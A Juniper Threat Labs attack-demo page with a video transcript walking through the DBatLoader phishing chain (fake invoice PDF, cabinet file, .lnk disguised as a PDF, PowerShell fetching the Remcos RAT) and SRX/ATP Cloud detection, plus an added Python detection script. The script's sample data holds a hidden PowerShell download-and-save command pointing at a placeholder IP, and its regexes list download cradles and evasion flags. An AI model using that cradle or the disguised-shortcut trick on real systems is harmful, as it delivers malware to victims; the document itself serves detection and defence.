DBatLoader Malware Juniper Threat Labs Attack Demo


It’s possible to protect systems from dangerous DBatLoader attacks. Here’s how.

This episode of Juniper Threat Labs Attack Demo focuses on DBatLoader, a particularly dangerous piece of malware currently targeting European companies and using phishing emails to lure its victims. The video demonstrates all of the stages of a DBatLoader attack and how Juniper helps customers protect themselves.


You’ll learn

  • How to detect, block, and isolate an infected system using a Juniper SRX firewall with ATP Cloud

  • How Juniper security systems are absolutely critical for protecting against malware attacks

Who is this for?

  • Security Professionals

  • Network Professionals

Transcript

0:00 Welcome to the Juniper Threat Labs Attack Demo series. Today's subject is DBatLoader malware.

0:04 This video will demonstrate how malicious threat actors conduct this multi-stage malware attack, but let's begin first with an introduction to DBatLoader malware.

0:15 DBatLoader is a malicious Windows executable PE file with the .exe extension. It's particularly dangerous as it loads other malware such as FormBook, a family of data-stealing malware.

0:26 In the example you're about to see, rather than download FormBook malware, DBatLoader instead downloads a remote access Trojan, or RAT. RATs are malware that permit attackers to remotely control the infected victim's PC.

0:36 Some of the RATs loaded by DBatLoader malware include Remcos RAT and NetWire RAT. In this particular attack you will see DBatLoader malware download the Remcos RAT.

0:49 Additionally, the threat actors behind this campaign were found to be abusing public cloud infrastructure.

0:55 DBatLoader malware currently targets European companies and uses phishing emails to lure its victims. The emails are deceptive in that they appear to come from legitimate companies, perhaps ones with which the targeted victim company may do business, and/or which the victim may wrongly think is the authentic, actual company.

1:11 As you can see from the attack chain, unlike our most recent video about Royal ransomware, DBatLoader malware has multiple stages, which help it to hide from some detection engines.

1:25 The first stage is a phishing campaign. It begins with an email sent to the prospective victim, usually about a purchase order.

1:30 The email contains a PDF attachment that looks like an invoice but is actually an image with a hyperlink that reads VIEW SECURED DOCUMENT in all caps in the center of the doc. Clicking that results in the victim downloading the next stage of the attack.

1:45 The malware then downloads a cabinet file. In the .cab file is what, to the unsuspecting user, looks to be another PDF, this time with the revised order. But it's not a PDF at all; instead it's a link file, or .lnk file, disguised as a PDF.

2:03 Link files are Microsoft Windows shortcuts. They point to another file, folder, or application.

2:09 When the .lnk file is clicked, or extracted in this case, the .lnk file, disguised as a PDF because of the double extension, downloads the DBatLoader executable, i.e. the next stage, and executes it with PowerShell. Inside this executable is the Remcos RAT which, when run, injects this RAT into the victim system's memory.

2:31 Now, with the background on DBatLoader malware out of the way, next up in this video Juniper Threat Labs demonstrates all of the stages of this attack.

2:39 Afterward, if a system were to be compromised, such as by a zero-day attack, let's say such as when DBatLoader first appeared in the wild, Juniper makes it easy for its customers to provide protection for the rest of the network.

2:53 We'll show you how you can detect, block, and isolate an infected system using a Juniper SRX firewall with ATP Cloud.

3:01 Let's get started. We're demonstrating this attack in a contained environment to show how it works.

3:05 The victim here received a phishing email from the malicious threat actor with an attachment entitled revised order document.pdf.

3:16 The malicious threat actor used a real company in the email footer, so we are obscuring that from view.

3:20 We start Wireshark and Process Monitor to show you the network activity and process activity on the victim system.

3:32 When the unsuspecting victim opens the PDF attachment, it looks like he or she has received a valid purchase order. The user is duped into believing that in order to view the actual secured document, he or she must click on VIEW SECURED DOCUMENT.

3:55 As soon as the user clicks this, the malware goes to that URL and downloads revised_order_document.cab. This cabinet file contains an .lnk file inside it disguised as a PDF.

4:27 ...is viewing file names, it appears to have a PDF extension, but he or she doesn't notice that under the file name Windows indicates the file is a "shortcut".

4:36 When the victim unwittingly opens the file, he or she is prompted to extract the file. In this case the victim decides to extract the file to the Downloads folder.

4:46 Navigating to the Downloads folder, the victim user double-clicks the extracted file. Because it is a link file rather than a PDF, the contents of the link file instruct the victim system to run a PowerShell command that downloads and installs DBatLoader.

4:59 In the Process Monitor you can see PowerShell here is running.

5:07 And here too in Process Monitor, highlighted in green, is the Remcos RAT, or remote access Trojan. Here it is named file.exe and, for the purposes of deception, has a PowerPoint icon.

5:20 file.exe, the Remcos RAT, was run after the PowerShell script retrieved and ran another file.

5:27 Checking Wireshark's output, we see both files that were downloaded with HTTP GET requests in this attack. The second one downloaded, with the highlighted long, unpronounceable name, is the DBatLoader malware that, once executed, injects file.exe, a.k.a. the Remcos remote access Trojan, into the victim's system.

5:53 Now we will simulate the DBatLoader malware attack again, but this time the victim is protected with the Juniper SRX firewall and Juniper ATP Cloud. Even so, for this part of the video we want to demonstrate how Juniper Connected Security solutions can detect, block, and isolate an infected system.

6:10 In order for us to demonstrate that, be aware that the malware has to initially go undetected.

6:14 For the demo, Juniper Threat Labs is using the following setup. We have a vSRX, pictured in the center. The vSRX is a virtual SRX firewall providing network security protection. Its purpose is to inspect network traffic and, with the assistance of Juniper ATP Cloud, to detect malware like DBatLoader.

6:34 In addition to the virtual firewall and cloud-based protections, we're using the Junos Space Security Director, which is a centralized management system. Security Director facilitates our configuring and monitoring of the vSRX firewall.

6:46 We are using Juniper's Junos Space Policy Enforcer as well. Juniper's Junos Space Policy Enforcer enforces security policies on endpoints and ensures they comply with corporate security standards.

6:58 Pictured as well are several Windows workstations, each of which is connected to the vSRX.

7:04 There is an Ubuntu server which is acting as the malware download server. We will be using one of the Windows hosts as a jump station to connect to the victim's host using RDP and, from there, launching the attack.

7:17 Before we proceed with the DBatLoader attack simulation, let's first take a look at the threat prevention policy that we've set up on our Security Director and applied to the vSRX.

7:33 To access the policy, we'll navigate to the Configure tab and then select Threat Prevention and Policies.

7:45 As you can see, we already have an existing policy in place. Let's further inspect the protections being enforced by the applied policy.

7:51 For this demo, our policy is configured to block command and control traffic at threat level 8 and above. We've also set it up to block infected hosts at threat level 8 and above.

8:03 Additionally, we've configured our policy to use ATP Cloud for malware detection, and as you can see, we've elected to scan both HTTP downloads and email attachments.

8:14 Finally, we've chosen to block any and all threats rated at level 7 and above.

8:20 This threat prevention policy, applied to the Juniper vSRX firewall, is a critical component of our defenses protecting our systems against malware-related attacks, including DBatLoader. It allows us to detect and block malicious traffic as well as the activity of potentially infected hosts, which will then prevent the spread of malware throughout our network in the event that one of our systems gets compromised.

8:44 Acting as would-be malicious threat actors for the demo, we now connect to the victim system via RDP.

8:59 To confirm that we have internet connectivity, we visit Wikipedia and YouTube.

9:15 Later we will show you that once the vSRX has identified this host as being infected, it will then be isolated from the network. Once that occurs, this infected host will be prevented by the Juniper Connected Security solutions from using the internet connection.

9:33 Recall that for the attack, the targeted victim was sent a phishing email with a PDF attachment. Opening the victim's email, here it is.

9:44 Next we start Wireshark to show the network activity. Specifically, we will want to look at the HTTP activity, which will show the malicious file downloads.

10:03 Simulating the victim, we open the malicious PDF attachment. We then click on the malicious URL in the file, and when we do, it downloads the cabinet file.

10:23 The victim then extracts the file inside, which is a link file: the .lnk file disguised as a PDF.

10:47 As soon as we double-click on the malicious link file, which invokes PowerShell, the malware downloads the malicious DBatLoader executable.

10:56 Let's check this out in Wireshark. The bottom-most HTTP GET request shows the effect of clicking on the .lnk file disguised as a PDF, namely the retrieval of DBatLoader.

11:09 Though there was no sandbox analysis performed at any stage of the attack sequence (and had there been, then we wouldn't have gotten this far), even so, at this point Juniper SRX, with the help of ATP, has detected the attack.

11:20 To show that the attack was detected by SRX, we go over to our Security Director. From the Monitor tab, we click on Threat Prevention and then HTTP File Download.

11:34 Doing that, we see that there was a file downloaded from silverline.com.sg that was detected at threat level 10.

11:42 You may recognize that file name by now, as you have seen it several times in this video. That's the DBatLoader malware executable.

11:50 By clicking on that row, we can view detailed information about this malware, including the static analysis that Juniper performs on the malware.

12:01 We also see behavior analysis and network activity.

12:11 As we'd said earlier, DBatLoader is making use of public cloud infrastructure. This here is a Microsoft-owned IP address.

12:19 In Security Director, we can also see the malware's behavior details, and we can look at the MITRE ATT&CK vectors that it uses.

12:41 Next, and again using Junos Space Security Director, this time we'll look at the ATP Cloud host tab. Here we can show you that the infected victim system has been added to the set of infected hosts, as the host was identified at threat level 9.

12:56 Clicking in on the host, we can learn more. Earlier, recall that we'd configured the vSRX to block hosts at threat level 8 and above. That explains why the vSRX smartly blocked this infected host. In this case, Juniper Security Director tells the security admin that it was blocked as a result of a malicious file download.

13:25 If we go back to our victim host, you can see that it no longer has internet connectivity.

14:12 Once we're sure that the DBatLoader-infected host is free from infection, we'll want to restore the infected system back to the network.

14:20 To do so, we go to Security Director and click on the infected host. To the right of the investigation status, we select Resolved Fixed. Afterwards, the host status is now Clean, and the host is connected once again to the network, enabled to operate as before.

14:58 Now that the infection has been resolved, we can verify that the host is back online by pinging systems on the internet and by visiting sites like YouTube through the browser, both of which demonstrate restored connectivity.

15:17 That completes our demo of DBatLoader malware. Check out more videos from the Juniper Threat Labs Attack Demo series by visiting juniper.net. Thanks for watching.
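The delivery chain narrated in the transcript (a .lnk shortcut carrying a double extension so it reads as a PDF, PowerShell invoked from that shortcut to fetch the loader, and the payload then run from a user-writable folder) can also be checked on the endpoint, independently of the firewall. One practitioner caveat worth knowing: Explorer never shows the .lnk suffix, regardless of the "hide extensions for known file types" setting, so a name like revised_order_document.pdf.lnk is displayed as revised_order_document.pdf with only a small shortcut-arrow overlay and the "Shortcut" type label the video points at; any check therefore has to look at the real file name, not the displayed one. The Python below is an added example by the editor, not code from Juniper or from the video. The Sysmon-style event records, file names, paths, command line and the TEST-NET IP address in it are constructed for illustration and are not indicators from the campaign; the rule thresholds are assumptions.

```python
"""
Endpoint detection for the three stages described in the video:
  1. a document-looking double extension (.pdf.lnk, .pdf.exe, ...) being written,
  2. PowerShell launched with a download cradle (and optionally evasion flags),
  3. PowerShell spawning an executable from a user-writable folder.
Events are dicts loosely shaped like Sysmon ProcessCreate / FileCreate records.
All sample data below is constructed for the example, not captured from the demo.
"""
import re
from pathlib import PureWindowsPath

# Extensions a user expects to be harmless documents, and executable types
# that attackers append after them to hide behind the document icon.
DOC_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".txt"}
EXEC_EXTS = {".lnk", ".exe", ".scr", ".bat", ".cmd", ".js", ".vbs", ".hta"}

# Common PowerShell download cradles and the flags typically used to hide them.
CRADLE_RE = re.compile(
    r"(Invoke-WebRequest|\biwr\b|Net\.WebClient|DownloadFile|DownloadString|"
    r"Start-BitsTransfer|\bcurl\b|\bwget\b)",
    re.IGNORECASE,
)
EVASION_RE = re.compile(
    r"(-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b|-nop\b|bypass)", re.IGNORECASE
)
USER_WRITABLE = ("\\downloads\\", "\\appdata\\", "\\temp\\", "\\tmp\\", "\\public\\")
POWERSHELL = ("powershell.exe", "pwsh.exe")


def disguised_double_extension(filename):
    """Return (doc_ext, exec_ext) when a document extension is immediately
    followed by an executable one, e.g. 'order.pdf.lnk' -> ('.pdf', '.lnk');
    otherwise None. Works on the real file name, not Explorer's display name."""
    suffixes = [s.lower() for s in PureWindowsPath(filename).suffixes]
    if len(suffixes) >= 2 and suffixes[-2] in DOC_EXTS and suffixes[-1] in EXEC_EXTS:
        return suffixes[-2], suffixes[-1]
    return None


def is_user_writable(path):
    """True if the path sits in a folder an unprivileged user can write to."""
    return any(marker in path.lower() for marker in USER_WRITABLE)


def basename(path):
    return PureWindowsPath(path).name.lower()


def detect(events):
    """Run the three rules over an ordered event list; return (rule, id, detail) tuples."""
    findings = []
    for ev in events:
        if ev["EventType"] == "FileCreate":
            hit = disguised_double_extension(ev["TargetFilename"])
            if hit:
                findings.append(("double_extension", ev["Id"], f"{hit[1]} file presented as {hit[0]}"))
        elif ev["EventType"] == "ProcessCreate":
            image, parent = basename(ev["Image"]), basename(ev["ParentImage"])
            cmd = ev.get("CommandLine", "")
            if image in POWERSHELL and CRADLE_RE.search(cmd):
                detail = "download cradle"
                if parent == "explorer.exe":  # user double-clicked something, e.g. the .lnk
                    detail += " launched from Explorer (shortcut double-click)"
                if EVASION_RE.search(cmd):
                    detail += ", with evasion flags"
                findings.append(("powershell_cradle", ev["Id"], detail))
            if parent in POWERSHELL and is_user_writable(ev["Image"]):
                findings.append(("payload_from_user_dir", ev["Id"], ev["Image"]))
    return findings


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
# Constructed sample events: three malicious stages plus two benign records.
SAMPLE_EVENTS = [
    {"Id": 1, "EventType": "FileCreate", "Image": "C:\\Windows\\explorer.exe",
     "TargetFilename": "C:\\Users\\victim\\Downloads\\revised_order_document.pdf.lnk"},
    {"Id": 2, "EventType": "ProcessCreate", "Image": PS, "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell.exe -w hidden -nop -c \"(New-Object Net.WebClient)"
                    ".DownloadFile('http://198.51.100.7/x','C:\\Users\\victim\\AppData\\Local\\Temp\\x.exe')\""},
    {"Id": 3, "EventType": "ProcessCreate", "Image": "C:\\Users\\victim\\AppData\\Local\\Temp\\x.exe",
     "ParentImage": PS, "CommandLine": "x.exe"},
    {"Id": 4, "EventType": "ProcessCreate", "Image": PS, "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "powershell.exe -File C:\\scripts\\inventory.ps1"},  # benign admin script
    {"Id": 5, "EventType": "FileCreate", "Image": "C:\\Windows\\explorer.exe",
     "TargetFilename": "C:\\Users\\victim\\Downloads\\quarterly_report.pdf"},  # benign download
]

if __name__ == "__main__":
    for rule, event_id, detail in detect(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule}: {detail}")
```

Run stand-alone it reports events 1, 2 and 3 and stays silent on the benign PowerShell script and the genuine PDF. Each rule alone is noisy in a real fleet (developers run cradles, installers write to AppData); the signal in the demo is the sequence, so in production these would be correlated on the same host within a short window rather than alerted on individually.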
